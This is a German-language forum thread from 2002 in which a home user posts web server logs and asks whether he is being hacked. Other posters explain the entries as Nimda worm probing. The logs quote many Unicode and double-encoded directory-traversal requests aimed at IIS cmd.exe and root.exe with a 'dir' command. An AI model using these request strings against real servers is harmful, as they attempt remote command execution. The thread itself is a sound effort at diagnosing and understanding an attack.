Werd' ich gehackt?

[-vudman-]

Guten Abend

seit kurzer Zeit zeigt mir mein Webserver - OmniHTTPd 2.09 unter Windows 98SE - Log-Einträge wie diese:

217.185.99.183 localhost - [06/May/2002:18:11:20 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 401 "" ""

Error reading "D:\HTTPD\HTDOCS\scripts\root.exe" - Der angegebene Pfad wurde nicht gefunden.

217.215.78.70 localhost - [06/May/2002:18:02:11 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" ""

Error reading "D:\HTTPD\HTDOCS\scripts\..%2f..\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden.

217.215.78.70 localhost - [06/May/2002:18:02:11 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" ""

Error reading "D:\HTTPD\HTDOCS\scripts\..%5c..\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden.

217.215.78.70 localhost - [06/May/2002:18:02:10 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" ""

Error reading "D:\HTTPD\HTDOCS\scripts\..S5c..\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden.

217.215.78.70 localhost - [06/May/2002:18:02:10 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" ""

Error reading "D:\HTTPD\HTDOCS\scripts\..S5c..\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden.

217.215.78.70 localhost - [06/May/2002:18:02:10 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" ""

Error reading "D:\HTTPD\HTDOCS\scripts\..ÃÅ“..\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden.

217.215.78.70 localhost - [06/May/2002:18:02:09 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" ""

Error reading "D:\HTTPD\HTDOCS\scripts\..À¯..\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden.

217.215.78.70 localhost - [06/May/2002:18:02:09 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" ""

Error reading "D:\HTTPD\HTDOCS\scripts\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden.

217.215.78.70 localhost - [06/May/2002:18:02:09 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 412 "" ""

Error reading "D:\HTTPD\HTDOCS\scripts\..Ã..\winnt\system32\cmd.exe" - Die Pfadangabe ist ungültig.

217.215.78.70 localhost - [06/May/2002:18:02:09 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 412 "" ""

Error reading "D:\HTTPD\HTDOCS\msadc\..%5c..\..%5c..\..%5c\..Ã..\..Ã..\..Ã..\winnt\system32\cmd.exe" - Die Pfadangabe ist ungültig.

217.215.78.70 localhost - [06/May/2002:18:02:08 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" ""

Error reading "D:\HTTPD\HTDOCS\_mem_bin\..%5c..\..%5c..\..%5c..\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden.

217.215.78.70 localhost - [06/May/2002:18:02:08 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" ""

Error reading "D:\HTTPD\HTDOCS\_vti_bin\..%5c..\..%5c..\..%5c..\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden.

217.215.78.70 localhost - [06/May/2002:18:02:08 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" ""

Error reading "D:\HTTPD\HTDOCS\scripts\..%5c..\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden.

217.215.78.70 localhost - [06/May/2002:18:02:07 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" ""

Error reading "D:\HTTPD\HTDOCS\d\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden.

217.215.78.70 localhost - [06/May/2002:18:02:07 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" ""

Error reading "D:\HTTPD\HTDOCS\c\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden.

217.215.78.70 localhost - [06/May/2002:18:02:07 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 401 "" ""

Error reading "D:\HTTPD\HTDOCS\MSADC\root.exe" - Der angegebene Pfad wurde nicht gefunden.

217.215.78.70 localhost - [06/May/2002:18:02:07 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 401 "" ""

Error reading "D:\HTTPD\HTDOCS\scripts\root.exe" - Der angegebene Pfad wurde nicht gefunden.

Meine eigene IP ist das garantiert nicht (ein Traceroute auf die IP brachte einen Host mit .se am Ende). Was mir bei der Sache recht spanisch vorkommt, ist, dass der Hacker (?) versucht, erst auf die nicht vorhandene root.exe zuzugreifen, danach versucht, auf die ebenfalls nicht vorhandene cmd.exe zuzugreifen, und dies in sehr schnellen Abständen macht. Hätte ich Windows 2000, könnte das ja CodeRed/Nimda sein, aber ich hab' Windows 98 ... ich habe gestern den Webserver von Port 80 auf Port 1337 gestellt, seitdem ist Ruhe, eine Virensuche mit der aktuellsten Version von AntiVir brachte keine Ergebnisse/Virenfunde.

Was könnte das sein?

tia & bye,

vudman

[tobias-digital]

...wäre spanisch nicht .es?

[nic_power]

Original geschrieben von -vudman-

Guten Abend

Hätte ich Windows 2000, könnte das ja CodeRed/Nimda sein, aber ich hab' Windows 98 ... ich habe gestern den Webserver von Port 80 auf Port 1337 gestellt, seitdem ist Ruhe, eine Virensuche mit der aktuellsten Version von AntiVir brachte keine Ergebnisse/Virenfunde.

Was könnte das sein?

tia & bye,

vudman

Das ist das typischen Angriffsmuster von Nimda. Dieser Wurm versucht von aussen ueber eine Bug im Microsoft IIS Web server in Deinen Rechner einzudringen. Der "Hacker" weiss wahrscheinlich gar nicht, dass eine seiner Maschinen infiziert ist und versucht bei Dir ins System zu kommen. Viel machen kannst Du da nicht (den Port hast Du ja schon geaendert). Eventuell koenntest Du dem Systemandiministrator des infizierten Systems benachrichtigen (.se ist Schweden). Das die Virensuche nichts findet ist klar, da der Virus bei Dir noch nicht im System ist.

[DanielB]

Solange du keinen MS IIS mit bekannter Sicherheitslücke verwendest, gibt es keinen Grund sich sorgen zu machen.

Wie nic schon sagte, weiss die Person, von der diese Anfragen ausgehen vermutlich gar nicht, dass sein Rechner infiziert ist. Desweiteren ist dieser "Angriff" zu 99.9% nichteinmal gezielt gegen deinen PC gerichtet.

Erinnert mich irgendwie an mein Apache Log vor einigen Monaten mit < 170k dieser Einträge

[-vudman-]

Hi,

vielen Dank für eure Antworten

Dachte wirklich, dort würde jemand absichtlich versuchen mich zu hacken, aber wenn dem nicht so ist, freut mich das doch mal :]

Nochmals thx & bye,

vudman

[Laura.T]

Original geschrieben von n's

...wäre spanisch nicht .es?

:OD

Danke Laura für Deinen geistreichen Kommentar!

TschiTschi

[Florum]

hehe, die gleiche erfahrung mit diesem virus habe ich vor ca. 2 monaten auch gemacht! dachte damals auch das ich von irgendeinem kerl gehackt werde!

naja, seitdem die kiste unter slackware läuft und ein vernünftiger apache drauf ist, ist mir das relativ egoool!

greets

florum

[aYre0n]

Hm wieso hat der Coder von dem Wurm net eine Abfrage eingebaut ob es sich bei dem Webserver um einen IIS handelt? hmmm naja egal.

Fakt is das viele IIS noch diesen Bug haben....

[nic_power]

Wahrscheinlich geht er davon aus, dass alle Web-Server dieser Welt IIS sind .

Nic

[daking]

fehlgeschlagener unicode exploit.

[DonMaro]

Original geschrieben von nic_power

Wahrscheinlich geht er davon aus, dass alle Web-Server dieser Welt IIS sind .

Nic

Wie man an der Verbreitungsgeschwindigkeit gesehen hat, hat er damit zu 95% auch recht gehabt... warum also unnötig was proggen ? Ihn störts ja auch nicht, wenn auch andere angegriffen werden...